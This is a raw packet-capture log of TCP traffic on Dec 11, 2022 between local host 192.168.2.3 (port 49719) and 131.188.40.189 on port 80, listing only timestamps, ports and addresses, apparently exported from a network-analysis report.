                          Dec 11, 2022 09:25:53.383070946 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.383115053 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.383238077 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.385490894 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385536909 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385580063 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385602951 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.385622978 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385668039 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385685921 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.385724068 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385767937 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385780096 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.385812044 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385854959 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385869026 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.385900974 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385942936 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.385958910 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.385989904 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386033058 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386045933 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386075974 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386121035 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386132002 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386163950 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386208057 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386223078 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386259079 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386282921 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386312008 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386316061 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386363029 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386378050 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386408091 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386459112 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386464119 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386485100 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386528969 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386547089 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386574030 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386616945 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386661053 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386661053 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386707067 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386727095 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386750937 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386796951 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386804104 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386841059 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386903048 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.386907101 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386950970 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.386996031 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387005091 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387041092 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387085915 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387094975 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387128115 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387171984 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387181044 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387214899 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387258053 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387267113 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387300968 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387343884 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387352943 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387387991 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387430906 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387439966 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387474060 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387516975 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387523890 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387558937 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387604952 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387617111 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387650013 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387692928 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387712002 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387736082 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387782097 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387787104 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387824059 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387866974 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387877941 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.387911081 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387953043 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.387965918 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388005018 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388027906 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388056993 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388072014 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388114929 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388132095 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388156891 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388200045 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388211012 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388246059 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388290882 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388307095 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388334990 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388377905 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388386965 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388422012 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388464928 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388475895 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388508081 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388550043 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388562918 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388598919 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388622999 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388654947 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388667107 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388711929 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388721943 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388755083 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388797045 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388808966 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388840914 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388875961 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388896942 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.388919115 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388962030 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.388971090 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.389008045 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389050961 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389069080 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.389094114 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389136076 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389147043 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.389178991 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389221907 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389230967 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.389262915 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389306068 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389316082 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.389348984 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389390945 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389400005 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.389435053 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389477015 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389488935 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.389520884 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389563084 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389573097 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.389605999 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389651060 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389657974 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.389693975 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.389743090 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.402759075 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.402821064 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.402865887 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.402952909 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.402951002 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.403011084 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.408693075 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.409800053 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.409863949 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.409909964 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.409954071 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.409981012 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410001993 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410032988 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410046101 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410092115 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410099983 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410135984 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410181046 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410198927 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410226107 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410269976 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410278082 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410315037 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410358906 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410362959 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410403967 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410449028 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410455942 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410495043 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410537958 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410546064 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410582066 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410624981 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410635948 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410671949 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410733938 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410741091 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410778999 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410823107 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410831928 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410896063 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410929918 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.410950899 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.410975933 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411020994 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411026001 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411066055 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411112070 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411124945 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411155939 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411199093 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411211014 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411241055 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411283970 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411292076 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411326885 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411369085 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411376953 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411412954 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411457062 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411475897 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411499977 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411541939 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411556959 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411598921 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411648989 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411658049 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411693096 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411736965 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411772966 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411778927 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411823034 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411834002 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411866903 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411909103 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411921978 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.411952972 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.411998034 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412000895 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412040949 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412084103 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412096977 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412127018 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412169933 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412179947 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412210941 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412254095 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412266970 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412301064 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412343979 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412357092 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412386894 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412431955 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412435055 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412482023 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412504911 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412542105 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412548065 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412590981 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412610054 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412633896 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412677050 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412707090 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412719965 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412765026 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412772894 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412811995 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412853956 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412862062 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412897110 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412938118 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.412949085 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.412993908 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413033962 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413048029 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413078070 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413120985 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413137913 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413162947 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413206100 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413214922 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413249016 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413290024 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413305998 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413333893 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413384914 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413388014 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413414955 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413458109 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413467884 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413500071 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413543940 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413554907 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413588047 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413634062 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413650990 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413676023 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413717985 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413729906 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413762093 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413805962 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413816929 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413845062 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413871050 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413898945 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.413913965 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.413958073 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.414004087 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.414019108 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.414058924 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.429049969 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429116964 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429162025 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429207087 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429236889 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.429250002 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429291964 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.429294109 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429341078 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429352999 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.429383993 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429418087 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429452896 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429496050 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429536104 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.429539919 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429554939 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.429584026 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429606915 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.429626942 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429668903 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429678917 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.429713011 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429758072 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429800034 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429843903 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429842949 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.429869890 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.429902077 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429944038 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.429990053 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430022001 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430036068 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.430036068 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.430064917 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430108070 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430123091 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.430150986 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430193901 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430207014 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.430238962 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430280924 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430294037 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.430324078 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430366993 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430375099 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.430408955 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430453062 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430459976 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.430511951 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430557013 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430566072 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.430600882 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430644035 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:53.430653095 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:53.430700064 CET8049719131.188.40.189192.168.2.3
